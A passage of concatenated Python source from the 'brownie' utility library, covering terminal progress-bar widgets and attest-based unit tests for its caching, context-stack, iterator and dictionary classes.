def init(self, progressbar, remaining_width, **kwargs):
return self.make_bar(remaining_width)
def update(self, progressbar, remaining_width, **kwargs):
width = remaining_width - 2
if (self.position + 3) > width:
self.position = width - 4
self.going_forward = False
elif self.going_forward:
self.position += 1
if self.position + 3 == width:
self.going_forward = False
else:
self.position -= 1
if self.position == 0:
self.going_forward = True
return self.make_bar(remaining_width)
class PercentageBarWidget(Widget):
"""
A simple bar which shows the progress in terms of a bar being filled
corresponding to the percentage of progress.
The bar is enclosed in brackets, progress is visualized with hashes `#`
the remaining part uses dots `.`.
"""
requires_fixed_size = True
def init(self, progressbar, remaining_width, **kwargs):
return '[%s]' % ('.' * (remaining_width - 2))
def update(self, progressbar, remaining_width, **kwargs):
percentage = 100 / progressbar.maxsteps * progressbar.step
marked_width = int(percentage * (remaining_width - 2) / 100)
return '[%s]' % ('#' * marked_width).ljust(remaining_width - 2, '.')
def finish(self, progressbar, remaining_width, **kwargs):
return '[%s]' % ('#' * (remaining_width - 2))
class StepWidget(Widget):
"""
Shows at which step we are currently at and how many are remaining as
`step of steps`.
:param unit:
If each step represents something other than a simple task e.g. a byte
when doing file transactions, you can specify a unit which is used.
Supported units:
- `'bytes'` - binary prefix only, SI might be added in the future
"""
requires_fixed_size = True
units = ImmutableDict({
'bytes': bytes_to_string,
None: unicode
})
def __init__(self, unit=None):
if unit not in self.units:
raise ValueError('unknown unit: %s' % unit)
self.unit = unit
def get_values(self, progressbar):
convert = self.units[self.unit]
return convert(progressbar.step), convert(progressbar.maxsteps)
def size_hint(self, progressbar):
step, maxsteps = self.get_values(progressbar)
return len(step) + len(maxsteps) + 4 # ' of '
def init(self, progressbar, remaining_width, **kwargs):
return u'%s of %s' % self.get_values(progressbar)
update = init
class TimeWidget(Widget):
"""
Shows the elapsed time in hours, minutes and seconds as
``$hours:$minutes:$seconds``.
This widget has a priority of 2.
"""
priority = 2
def init(self, progressbar, remaining_width, **kwargs):
self.start_time = datetime.now()
return '00:00:00'
def update(self, progressbar, remaining_width, **kwargs):
seconds = (datetime.now() - self.start_time).seconds
minutes = 0
hours = 0
minute = 60
hour = minute * 60
if seconds > hour:
hours, seconds = divmod(seconds, hour)
if seconds > minute:
minutes, seconds = divmod(seconds, minute)
return '%02i:%02i:%02i' % (hours, minutes, seconds)
class DataTransferSpeedWidget(Widget):
"""
Shows the data transfer speed in bytes per second using SI prefixes.
This widget has a priority of 2.
"""
priority = 2
def init(self, progressbar, remaining_width, **kwargs):
self.begin_timing = datetime.now()
self.last_step = 0
return '0kb/s'
def update(self, progressbar, remaining_width, **kwargs):
end_timing = datetime.now()
# .seconds is an integer so our calculations result in 0 if each update
# takes less than a second, therefore we have to calculate the exact
# time in seconds
elapsed = (end_timing - self.begin_timing).microseconds * 10 ** -6
step = progressbar.step - self.last_step
if elapsed == 0:
result = '%.02f%s/s' % bytes_to_readable_format(0, binary=False)
else:
result = '%.02f%s/s' % bytes_to_readable_format(
step / elapsed,
binary=False
)
self.begin_timing = end_timing
self.last_step = progressbar.step
return result
class ProgressBar(object):
"""
A progress bar which acts as a container for various widgets which may be
part of a progress bar.
Initializing and finishing can be done by using the progress bar as a
context manager instead of calling :meth:`init` and :meth:`finish`.
:param widgets:
An iterable of widgets which should be used.
:param writer:
A :class:`~brownie.terminal.TerminalWriter` which is used by the
progress bar.
:param maxsteps:
The number of steps, not necessarily updates, which are to be made.
"""
@classmethod
def from_string(cls, string, writer, maxsteps=None, widgets=None):
"""
Returns a :class:`ProgressBar` from a string.
The string is used as a progressbar, ``$[a-zA-Z]+`` is substituted with
a widget as defined by `widgets`.
``$`` can be escaped with another ``$`` e.g. ``$$foo`` will not be
substituted.
Initial values as required for the :class:`HintWidget` are given like
this ``$hint:initial``, if the initial value is supposed to contain a
space you have to use a quoted string ``$hint:"foo bar"``; quoted can
be escaped using a backslash.
If you want to provide your own widgets or overwrite existing ones
pass a dictionary mapping the desired names to the widget classes to
this method using the `widgets` keyword argument. The default widgets
are:
+--------------+----------------------------------+-------------------+
| Name | Class | Requires maxsteps |
+==============+==================================+===================+
| `text` | :class:`TextWidget` | No |
+--------------+----------------------------------+-------------------+
| `hint` | :class:`HintWidget` | No |
+--------------+----------------------------------+-------------------+
| `percentage` | :class:`Percentage` | Yes |
+--------------+----------------------------------+-------------------+
| `bar` | :class:`BarWidget` | No |
+--------------+----------------------------------+-------------------+
| `sizedbar` | :class:`PercentageBarWidget` | Yes |
+--------------+----------------------------------+-------------------+
| `step` | :class:`StepWidget` | Yes |
+--------------+----------------------------------+-------------------+
| `time` | :class:`TimeWidget` | No |
+--------------+----------------------------------+-------------------+
| `speed` | :class:`DataTransferSpeedWidget` | No |
+--------------+----------------------------------+-------------------+
"""
default_widgets = {
'text': TextWidget,
'hint': HintWidget,
'percentage': PercentageWidget,
'bar': BarWidget,
'sizedbar': PercentageBarWidget,
'step': StepWidget,
'time': TimeWidget,
'speed': DataTransferSpeedWidget
}
widgets = dict(default_widgets.copy(), **(widgets or {}))
rv = []
for name, initial in parse_progressbar(string):
if name not in widgets:
raise ValueError('widget not found: %s' % name)
if initial:
widget = widgets[name](initial)
else:
widget = widgets[name]()
rv.append(widget)
return cls(rv, writer, maxsteps=maxsteps)
def __init__(self, widgets, writer, maxsteps=None):
widgets = list(widgets)
if maxsteps is None:
for widget in widgets:
if widget.requires_fixed_size:
raise ValueError(
'%r requires maxsteps to be given' % widget
)
self.widgets = widgets
self.writer = writer
self.maxsteps = maxsteps
self.step = 0
def get_step(self):
return self._step
def set_step(self, new_step):
if self.maxsteps is None or new_step <= self.maxsteps:
self._step = new_step
else:
raise ValueError('step cannot be larger than maxsteps')
step = property(get_step, set_step)
del get_step, set_step
def __iter__(self):
return self
def get_widgets_by_priority(self):
"""
Returns an iterable of tuples consisting of the position of the widget
and the widget itself ordered by each widgets priority.
"""
return sorted(
enumerate(self.widgets),
key=lambda x: x[1].priority,
reverse=True
)
def get_usable_width(self):
"""
Returns the width usable by all widgets which don't provide a size
hint.
"""
return self.writer.get_usable_width() - sum(
widget.size_hint(self) for widget in self.widgets
if widget.provides_size_hint
)
def write(self, string, update=True):
if update:
self.writer.write('\r', escape=False, flush=False)
self.writer.begin_line()
self.writer.write(string)
def make_writer(updating=True, finishing=False):
def decorate(func):
@wraps(func)
def wrapper(self, **kwargs):
if finishing and self.step == self.maxsteps:
return
if updating and not finishing:
self.step += kwargs.get('step', 1)
parts = []
remaining_width = self.get_usable_width()
for i, widget in self.get_widgets_by_priority():
part = func(self, widget, remaining_width, **kwargs)
if not widget.provides_size_hint:
remaining_width -= len(part)
parts.append((i, part))
parts.sort()
self.write(''.join(part for _, part in parts), update=updating)
if finishing:
self.writer.newline()
return wrapper
return decorate
@make_writer(updating=False)
def init(self, widget, remaining_width, **kwargs):
"""
Writes the initial progress bar to the terminal.
"""
return widget.init(self, remaining_width, **kwargs)
@make_writer()
def next(self, widget, remaining_width, step=1, **kwargs):
"""
Writes an updated version of the progress bar to the terminal.
If the update corresponds to multiple steps, pass the number of steps
which have been made as an argument. If `step` is larger than
`maxsteps` a :exc:`ValueError` is raised.
"""
return widget.update(self, remaining_width, **kwargs)
@make_writer(finishing=True)
def finish(self, widget, remaining_width, **kwargs):
"""
Writes the finished version of the progress bar to the terminal.
This method may be called even if `maxsteps` has not been reached or
has not been defined.
"""
return widget.finish(self, remaining_width, **kwargs)
del make_writer
def __enter__(self):
self.init()
return self
def __exit__(self, etype, evalue, traceback):
if etype is None:
self.finish()
def __repr__(self):
return '%s(%r, %r, maxsteps=%r)' % (
self.__class__.__name__, self.widgets, self.writer, self.maxsteps
)
__all__ = [
'ProgressBar', 'TextWidget', 'HintWidget', 'PercentageWidget', 'BarWidget',
'PercentageBarWidget', 'StepWidget', 'TimeWidget', 'DataTransferSpeedWidget'
]
########NEW FILE########
__FILENAME__ = __main__
# coding: utf-8
"""
brownie.terminal
~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import sys
from brownie.terminal import TerminalWriter, _colour_names, ATTRIBUTES
writer = TerminalWriter(sys.stdout)
for name in _colour_names:
with writer.line():
writer.write(name, text_colour=name)
with writer.line():
writer.write(name, background_colour=name)
for name in ATTRIBUTES:
if name == 'reset':
continue
writer.writeline(name, **{name: True})
with writer.line():
with writer.options(underline=True):
writer.write('underline')
with writer.options(background_colour='red'):
writer.write('background')
writer.write('text', text_colour='green')
writer.write('background')
writer.write('underline')
########NEW FILE########
__FILENAME__ = abstract
# coding: utf-8
"""
brownie.tests.abstract
~~~~~~~~~~~~~~~~~~~~~~
Tests for mod:`brownie.abstract`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import sys
from attest import Tests, TestBase, test_if, test, Assert
from brownie.itools import product
from brownie.abstract import VirtualSubclassMeta, ABCMeta, AbstractClassMeta
GE_PYTHON_26 = sys.version_info >= (2, 6)
tests = Tests()
@tests.test_if(GE_PYTHON_26)
def test_virtual_subclass_meta():
from abc import ABCMeta
class Foo(object):
__metaclass__ = ABCMeta
class Bar(object):
__metaclass__ = ABCMeta
class Simple(object):
__metaclass__ = VirtualSubclassMeta
virtual_superclasses = [Foo, Bar]
class InheritingSimple(Simple):
pass
for a, b in product([Simple, InheritingSimple], [Foo, Bar]):
Assert.issubclass(a, b)
Assert.isinstance(a(), b)
Assert.issubclass(InheritingSimple, Simple)
Assert.isinstance(InheritingSimple(), Simple)
class Spam(object):
__metaclass__ = ABCMeta
class Eggs(object):
__metaclass__ = ABCMeta
class SimpleMonty(object):
__metaclass__ = VirtualSubclassMeta
virtual_superclasses = [Spam, Eggs]
class MultiInheritance(Simple, SimpleMonty):
pass
class MultiVirtualInheritance(object):
__metaclass__ = VirtualSubclassMeta
virtual_superclasses = [Simple, SimpleMonty]
for virtual_super_cls in [Foo, Bar, Simple, Spam, Eggs, SimpleMonty]:
Assert.issubclass(MultiInheritance, virtual_super_cls)
Assert.isinstance(MultiInheritance(), virtual_super_cls)
class TestABCMeta(TestBase):
@test_if(GE_PYTHON_26)
def type_checks_work(self):
class Foo(object):
__metaclass__ = ABCMeta
class Bar(object):
pass
Foo.register(Bar)
Assert.issubclass(Bar, Foo)
Assert.isinstance(Bar(), Foo)
@test
def api_works_cleanly(self):
class Foo(object):
__metaclass__ = ABCMeta
class Bar(object):
pass
Foo.register(Bar)
tests.register(TestABCMeta)
@tests.test_if(GE_PYTHON_26)
def test_abstract_class_meta():
class Foo(object):
__metaclass__ = ABCMeta
class Bar(object):
__metaclass__ = AbstractClassMeta
virtual_superclasses = [Foo]
class Baz(object):
__metaclass__ = VirtualSubclassMeta
virtual_superclasses = [Bar]
Assert.issubclass(Baz, Foo)
Assert.issubclass(Baz, Bar)
########NEW FILE########
__FILENAME__ = caching
# coding: utf-8
"""
brownie.tests.caching
~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.caching`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import time
from attest import Tests, Assert, TestBase, test
from brownie.caching import cached_property, LRUCache, LFUCache, memoize
tests = Tests()
@tests.test
def test_cached_property():
class Foo(object):
def __init__(self):
self.counter = 0
@cached_property
def spam(self):
self.counter += 1
return self.counter
Assert(Foo.spam).is_(Foo.spam)
foo = Foo()
Assert(foo.spam) == 1
Assert(foo.spam) == 1
class TestLRUCache(TestBase):
@test
def decorate(self):
@LRUCache.decorate(2)
def foo(*args, **kwargs):
time.sleep(.1)
return args, kwargs
tests = [
(('foo', 'bar'), {}),
(('foo', 'bar'), {'spam': 'eggs'}),
((1, 2), {})
]
times = []
for test in tests:
args, kwargs = test
old = time.time()
Assert(foo(*args, **kwargs)) == test
new = time.time()
uncached_time = new - old
old = time.time()
Assert(foo(*args, **kwargs)) == test
new = time.time()
cached_time = new - old
Assert(cached_time) < uncached_time
times.append((uncached_time, cached_time))
old = time.time()
foo(*tests[0][0], **tests[0][1])
new = time.time()
Assert(new - old) > times[0][1]
@test
def basics(self):
cache = LRUCache(maxsize=2)
cache[1] = 2
cache[3] = 4
cache[5] = 6
Assert(cache.items()) == [(3, 4), (5, 6)]
@test
def repr(self):
cache = LRUCache()
Assert(repr(cache)) == 'LRUCache({}, inf)'
tests.register(TestLRUCache)
class TestLFUCache(TestBase):
@test
def basics(self):
cache = LFUCache(maxsize=2)
cache[1] = 2
cache[3] = 4
cache[3]
cache[5] = 6
Assert(cache.items()) == [(1, 2), (5, 6)]
@test
def repr(self):
cache = LFUCache()
Assert(repr(cache)) == 'LFUCache({}, inf)'
tests.register(TestLFUCache)
@tests.test
def test_memoize():
@memoize
def foo(a, b):
return a + b
Assert(foo(1, 1)) == 2
Assert(foo(1, 1)) == 2
Assert(foo(1, 2)) == 3
########NEW FILE########
__FILENAME__ = context
# coding: utf-8
"""
brownie.tests.context
~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.context`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from Queue import Queue
from threading import Thread, Event
from attest import Tests, TestBase, Assert, test, test_if
try:
import eventlet
except ImportError:
eventlet = None
from brownie.context import (
ContextStackManagerBase, ContextStackManagerThreadMixin,
ContextStackManagerEventletMixin
)
class TestContextStackManagerBase(TestBase):
@test
def application_context(self):
csm = ContextStackManagerBase()
csm.push_application('foo')
Assert(list(csm.iter_current_stack())) == ['foo']
csm.push_application('bar')
Assert(list(csm.iter_current_stack())) == ['bar', 'foo']
Assert(csm.pop_application()) == 'bar'
Assert(csm.pop_application()) == 'foo'
with Assert.raises(RuntimeError):
csm.pop_application()
@test_if(eventlet)
def context_inheritance(self):
class FooContextManager(
ContextStackManagerEventletMixin,
ContextStackManagerThreadMixin,
ContextStackManagerBase
):
pass
csm = FooContextManager()
csm.push_application('foo')
def foo(csm, queue):
csm.push_thread('bar')
queue.put(list(csm.iter_current_stack()))
eventlet.spawn(bar, csm, queue).wait()
queue.put(list(csm.iter_current_stack()))
def bar(csm, queue):
csm.push_coroutine('baz')
queue.put(list(csm.iter_current_stack()))
queue = Queue()
thread = Thread(target=foo, args=(csm, queue))
thread.start()
Assert(queue.get()) == ['bar', 'foo']
Assert(queue.get()) == ['baz', 'bar', 'foo']
Assert(queue.get()) == ['bar', 'foo']
Assert(list(csm.iter_current_stack())) == ['foo']
class ThreadContextStackManager(
ContextStackManagerThreadMixin,
ContextStackManagerBase
):
pass
class TestContextStackManagerThreadMixin(TestBase):
@test
def inherits_application_stack(self):
csm = ThreadContextStackManager()
csm.push_application('foo')
def foo(csm, queue):
queue.put(list(csm.iter_current_stack()))
csm.push_thread('bar')
queue.put(list(csm.iter_current_stack()))
queue = Queue()
thread = Thread(target=foo, args=(csm, queue))
thread.start()
thread.join()
Assert(queue.get()) == ['foo']
Assert(queue.get()) == ['bar', 'foo']
Assert(list(csm.iter_current_stack())) == ['foo']
@test
def multiple_thread_contexts(self):
csm = ThreadContextStackManager()
def make_func(name):
def func(csm, queue, event):
csm.push_thread(name)
queue.put(list(csm.iter_current_stack()))
event.wait()
func.__name__ = name
return func
foo_queue = Queue()
bar_queue = Queue()
foo_event = Event()
bar_event = Event()
foo_thread = Thread(
target=make_func('foo'), args=(csm, foo_queue, foo_event)
)
bar_thread = Thread(
target=make_func('bar'), args=(csm, bar_queue, bar_event)
)
foo_thread.start()
# during that time foo should have pushed an object on
# the thread local stack
time.sleep(1)
bar_thread.start()
foo_event.set()
bar_event.set()
Assert(foo_queue.get()) == ['foo']
Assert(bar_queue.get()) == ['bar']
Assert(list(csm.iter_current_stack())) == []
@test
def basics(self):
csm = ThreadContextStackManager()
with Assert.raises(RuntimeError):
csm.pop_thread()
csm.push_thread('foo')
Assert(list(csm.iter_current_stack())) == ['foo']
csm.push_thread('bar')
Assert(list(csm.iter_current_stack())) == ['bar', 'foo']
Assert(csm.pop_thread()) == 'bar'
Assert(list(csm.iter_current_stack())) == ['foo']
class EventletContextStackManager(
ContextStackManagerEventletMixin,
ContextStackManagerBase
):
pass
class TestContextStackManagerEventletMixin(TestBase):
if eventlet:
@test
def inherits_application_stack(self):
csm = EventletContextStackManager()
csm.push_application('foo')
def foo(csm, queue):
queue.put(list(csm.iter_current_stack()))
csm.push_coroutine('bar')
queue.put(list(csm.iter_current_stack()))
queue = eventlet.Queue()
greenthread = eventlet.spawn(foo, csm, queue)
greenthread.wait()
Assert(queue.get()) == ['foo']
Assert(queue.get()) == ['bar', 'foo']
@test
def multiple_greenthread_contexts(self):
csm = EventletContextStackManager()
def make_func(name):
def func(csm, queue):
csm.push_coroutine(name)
queue.put(list(csm.iter_current_stack()))
func.__name__ = name
return func
foo_queue = eventlet.Queue()
bar_queue = eventlet.Queue()
foo = eventlet.spawn(make_func('foo'), csm, foo_queue)
bar = eventlet.spawn(make_func('bar'), csm, bar_queue)
foo.wait()
bar.wait()
Assert(foo_queue.get()) == ['foo']
Assert(bar_queue.get()) == ['bar']
@test
def basics(self):
csm = EventletContextStackManager()
with Assert.raises(RuntimeError):
csm.pop_coroutine()
csm.push_coroutine('foo')
Assert(list(csm.iter_current_stack())) == ['foo']
csm.push_coroutine('bar')
Assert(list(csm.iter_current_stack())) == ['bar', 'foo']
Assert(csm.pop_coroutine()) == 'bar'
Assert(list(csm.iter_current_stack())) == ['foo']
else:
@test
def init(self):
with Assert.raises(RuntimeError):
EventletContextStackManager()
tests = Tests([
TestContextStackManagerBase, TestContextStackManagerThreadMixin,
TestContextStackManagerEventletMixin
])
########NEW FILE########
__FILENAME__ = iterators
# coding: utf-8
"""
brownie.tests.datastructures.iterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.iterators`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import PeekableIterator
class TestPeekableIterator(TestBase):
@test
def iter(self):
original = range(10)
iterator = PeekableIterator(original)
for item, expected in zip(original, iterator):
Assert(item) == expected
@test
def iter_returns_self(self):
iterator = PeekableIterator(range(10))
Assert(iter(iterator)).is_(iterator)
@test
def peek(self):
iterator = PeekableIterator(range(10))
with Assert.raises(ValueError):
iterator.peek(0)
with Assert.raises(ValueError):
iterator.peek(-1)
Assert(iterator.peek(11)) == range(10)
Assert(iterator.peek(10)) == range(10)
for item, expected in zip(iterator, range(10)):
Assert(item) == expected
iterator = PeekableIterator(range(10))
Assert(iterator.peek()) == iterator.peek()
Assert(iterator.peek()) == [0]
Assert(iterator.peek(10)) == range(10)
Assert(iterator.peek(5)) == range(5)
@test
def repr(self):
original = iter(xrange(10))
iterator = PeekableIterator(original)
Assert(repr(iterator)) == 'PeekableIterator(%r)' % iter(original)
tests = Tests([TestPeekableIterator])
########NEW FILE########
__FILENAME__ = mappings
# coding: utf-8
"""
brownie.tests.datastructures.mappings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.mappings`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import sys
import pickle
from attest import Tests, TestBase, test, test_if, Assert
from brownie.datastructures import (
ImmutableDict,
CombinedDict,
MultiDict,
ImmutableMultiDict,
CombinedMultiDict,
OrderedDict,
OrderedMultiDict,
ImmutableOrderedDict,
ImmutableOrderedMultiDict,
FixedDict,
Counter
)
GE_PYTHON_26 = sys.version_info >= (2, 6)
class DictTestMixin(object):
dict_class = None
@test
def fromkeys(self):
d = self.dict_class.fromkeys([1, 2])
Assert(d[1]) == None
Assert(d[2]) == None
d = self.dict_class.fromkeys([1, 2], 'foo')
Assert(d[1]) == 'foo'
Assert(d[2]) == 'foo'
Assert(d.__class__).is_(self.dict_class)
@test
def init(self):
data = [(1, 2), (3, 4)]
with Assert.raises(TypeError):
self.dict_class(*data)
for mapping_type in [lambda x: x, self.dict_class]:
d = self.dict_class(mapping_type(data))
Assert(d[1]) == 2
Assert(d[3]) == 4
d = self.dict_class(foo='bar', spam='eggs')
Assert(d['foo']) == 'bar'
Assert(d['spam']) == 'eggs'
d = self.dict_class([('foo', 'bar'), ('spam', 'eggs')], foo='baz')
Assert(d['foo']) == 'baz'
Assert(d['spam']) == 'eggs'
@test
def copy(self):
d = self.dict_class()
Assert(d.copy()).is_not(d)
@test
def setitem(self):
d = self.dict_class()
d[1] = 2
Assert(d[1]) == 2
d[1] = 3
Assert(d[1]) == 3
@test
def getitem(self):
d = self.dict_class([(1, 2), (3, 4)])
Assert(d[1]) == 2
Assert(d[3]) == 4
@test
def delitem(self):
d = self.dict_class()
d[1] = 2
Assert(d[1]) == 2
del d[1]
with Assert.raises(KeyError):
del d[1]
@test
def get(self):
d = self.dict_class()
Assert(d.get(1)) == None
Assert(d.get(1, 2)) == 2
d = self.dict_class({1: 2})
Assert(d.get(1)) == 2
Assert(d.get(1, 3)) == 2
@test
def setdefault(self):
d = self.dict_class()
Assert(d.setdefault(1)) == None
Assert(d[1]) == None
Assert(d.setdefault(1, 2)) == None
Assert(d.setdefault(3, 4)) == 4
Assert(d[3]) == 4
@test
def pop(self):
d = self.dict_class()
d[1] = 2
Assert(d.pop(1)) == 2
with Assert.raises(KeyError):
d.pop(1)
Assert(d.pop(1, 2)) == 2
@test
def popitem(self):
d = self.dict_class([(1, 2), (3, 4)])
items = iter(d.items())
while d:
Assert(d.popitem()) == items.next()
@test
def clear(self):
d = self.dict_class([(1, 2), (3, 4)])
assert d
d.clear()
assert not d
@test
def item_accessor_equality(self):
d = self.dict_class([(1, 2), (3, 4)])
Assert(list(d)) == d.keys()
Assert(list(d.iterkeys())) == d.keys()
Assert(list(d.itervalues())) == d.values()
Assert(list(d.iteritems())) == d.items()
for key, value, item in zip(d.keys(), d.values(), d.items()):
Assert((key, value)) == item
Assert(d[key]) == value
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update((1, 2), (3, 4))
for mapping in ([(1, 2), (3, 4)], self.dict_class([(1, 2), (3, 4)])):
d.update(mapping)
Assert(d[1]) == 2
Assert(d[3]) == 4
d = self.dict_class()
d.update([('foo', 'bar'), ('spam', 'eggs')], foo='baz')
Assert(d['foo']) == 'baz'
Assert(d['spam']) == 'eggs'
@test
def repr(self):
d = self.dict_class()
Assert(repr(d)) == '%s()' % d.__class__.__name__
original = {1: 2}
d = self.dict_class(original)
Assert(repr(d)) == '%s(%s)' % (d.__class__.__name__, repr(original))
@test
def test_custom_new(self):
class D(self.dict_class):
def __new__(cls, *args, **kwargs):
return 42
Assert(D.fromkeys([])) == 42
@test
def picklability(self):
d = self.dict_class([(1, 2), (3, 4)])
pickled = pickle.loads(pickle.dumps(d))
Assert(pickled == d)
Assert(pickled.__class__).is_(d.__class__)
class ImmutableDictTestMixin(DictTestMixin):
@test
def setitem(self):
for d in (self.dict_class(), self.dict_class({1: 2})):
with Assert.raises(TypeError):
d[1] = 2
@test
def delitem(self):
for d in (self.dict_class(), self.dict_class({1: 2})):
with Assert.raises(TypeError):
del d[1]
@test
def setdefault(self):
for d in (self.dict_class(), self.dict_class({1: 2})):
with Assert.raises(TypeError):
d.setdefault(1)
with Assert.raises(TypeError):
d.setdefault(1, 3)
@test
def pop(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.pop(1)
with Assert.raises(TypeError):
d.pop(1, 2)
d = self.dict_class({1: 2})
with Assert.raises(TypeError):
d.pop(1)
@test
def popitem(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.popitem()
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update([])
with Assert.raises(TypeError):
d.update(foo='bar')
@test
def clear(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.clear()
class TestImmutableDict(TestBase, ImmutableDictTestMixin):
dict_class = ImmutableDict
@test_if(GE_PYTHON_26)
def type_checking(self):
Assert.isinstance(self.dict_class(), dict)
@test
def hashability(self):
a = self.dict_class([(1, 2), (3, 4)])
b = self.dict_class(a)
Assert(hash(a)) == hash(b)
Assert(hash(a)) != hash(ImmutableDict([(1, 2), (5, 6)]))
with Assert.raises(TypeError):
hash(ImmutableDict({1: []}))
class CombinedDictTestMixin(object):
# .fromkeys() doesn't work here, so we don't need that test
test_custom_new = None
@test
def fromkeys(self):
with Assert.raises(TypeError):
self.dict_class.fromkeys(['foo', 'bar'])
@test
def init(self):
with Assert.raises(TypeError):
self.dict_class(foo='bar')
self.dict_class([{}, {}])
@test
def getitem(self):
d = self.dict_class([{1: 2, 3: 4}, {1: 4, 3: 2}])
Assert(d[1]) == 2
Assert(d[3]) == 4
@test
def get(self):
d = self.dict_class()
Assert(d.get(1)) == None
Assert(d.get(1, 2)) == 2
d = self.dict_class([{1: 2}, {1: 3}])
Assert(d.get(1)) == 2
Assert(d.get(1, 4)) == 2
@test
def item_accessor_equality(self):
d = self.dict_class([{1: 2}, {1: 3}, {2: 4}])
Assert(d.keys()) == [1, 2]
Assert(d.values()) == [2, 4]
Assert(d.items()) == [(1, 2), (2, 4)]
Assert(list(d)) == list(d.iterkeys()) == d.keys()
Assert(list(d.itervalues())) == d.values()
Assert(list(d.iteritems())) == d.items()
@test
def repr(self):
Assert(repr(self.dict_class())) == '%s()' % self.dict_class.__name__
d = self.dict_class([{}, {1: 2}])
Assert(repr(d)) == '%s([{}, {1: 2}])' % self.dict_class.__name__
class TestCombinedDict(TestBase, CombinedDictTestMixin, ImmutableDictTestMixin):
dict_class = CombinedDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
Assert.isinstance(d, ImmutableDict)
Assert.isinstance(d, dict)
@test
def hashability(self):
a = CombinedDict([ImmutableDict({1: 2}), ImmutableDict({3: 4})])
Assert(hash(a)) == hash(CombinedDict(a.dicts))
Assert(hash(a)) != hash(CombinedDict(reversed(a.dicts)))
with Assert.raises(TypeError):
hash(CombinedDict([{}]))
class MultiDictTestMixin(object):
dict_class = None
@test
def init_with_lists(self):
d = self.dict_class({'foo': ['bar'], 'spam': ['eggs']})
Assert(d['foo']) == 'bar'
Assert(d['spam']) == 'eggs'
@test
def add(self):
d = self.dict_class()
d.add('foo', 'bar')
d.add('foo', 'spam')
Assert(d['foo']) == 'bar'
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def getlist(self):
d = self.dict_class()
Assert(d.getlist('foo')) == []
d = self.dict_class({'foo': 'bar'})
Assert(d.getlist('foo')) == ['bar']
d = self.dict_class({'foo': ['bar', 'spam']})
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def setlist(self):
d = self.dict_class()
d.setlist('foo', ['bar', 'spam'])
Assert(d['foo']) == 'bar'
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def setlistdefault(self):
d = self.dict_class()
Assert(d.setlistdefault('foo')) == [None]
Assert(d['foo']).is_(None)
Assert(d.setlistdefault('foo', ['bar'])) == [None]
Assert(d['foo']).is_(None)
Assert(d.setlistdefault('spam', ['eggs'])) == ['eggs']
Assert(d['spam']) == 'eggs'
@test
def multi_items(self):
d = self.dict_class({
'foo': ['bar'],
'spam': ['eggs', 'monty']
})
Assert(len(d.items())) == 2
Assert(len(d.items(multi=True))) == 3
Assert(d.items(multi=True)) == list(d.iteritems(multi=True))
keys = [pair[0] for pair in d.items(multi=True)]
Assert(set(keys)) == set(['foo', 'spam'])
values = [pair[1] for pair in d.items(multi=True)]
Assert(set(values)) == set(['bar', 'eggs', 'monty'])
@test
def lists(self):
d = self.dict_class({
'foo': ['bar', 'baz'],
'spam': ['eggs', 'monty']
})
Assert(d.lists()) == list(d.iterlists())
('foo', ['bar', 'baz']) in Assert(d.lists())
('spam', ['eggs', 'monty']) in Assert(d.lists())
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update((1, 2), (3, 4))
d.update({'foo': 'bar'})
Assert(d['foo']) == 'bar'
d.update([('foo', 'spam')])
Assert(d['foo']) == 'bar'
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def poplist(self):
d = self.dict_class({'foo': 'bar', 'spam': ['eggs', 'monty']})
Assert(d.poplist('foo')) == ['bar']
Assert(d.poplist('spam')) == ['eggs', 'monty']
Assert(d.poplist('foo')) == []
@test
def popitemlist(self):
d = self.dict_class({'foo': 'bar'})
Assert(d.popitemlist()) == ('foo', ['bar'])
with Assert.raises(KeyError):
d.popitemlist()
d = self.dict_class({'foo': ['bar', 'baz']})
Assert(d.popitemlist()) == ('foo', ['bar', 'baz'])
with Assert.raises(KeyError):
d.popitemlist()
@test
def repr(self):
d = self.dict_class()
Assert(repr(d)) == '%s()' % d.__class__.__name__
original = {1: [2, 3]}
d = self.dict_class(original)
Assert(repr(d)) == '%s(%s)' % (d.__class__.__name__, repr(original))
class TestMultiDict(TestBase, MultiDictTestMixin, DictTestMixin):
dict_class = MultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
Assert.isinstance(self.dict_class(), dict)
class ImmutableMultiDictTestMixin(MultiDictTestMixin):
@test
def add(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.add(1, 2)
@test
def setlist(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.setlist(1, [2, 3])
@test
def setlistdefault(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.setlistdefault(1)
with Assert.raises(TypeError):
d.setlistdefault(1, [2, 3])
@test
def poplist(self):
for d in (self.dict_class(), self.dict_class({1: [2, 3]})):
with Assert.raises(TypeError):
d.poplist(1)
@test
def popitemlist(self):
for d in (self.dict_class(), self.dict_class({1: [2, 3]})):
with Assert.raises(TypeError):
d.popitemlist()
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update({1: 2})
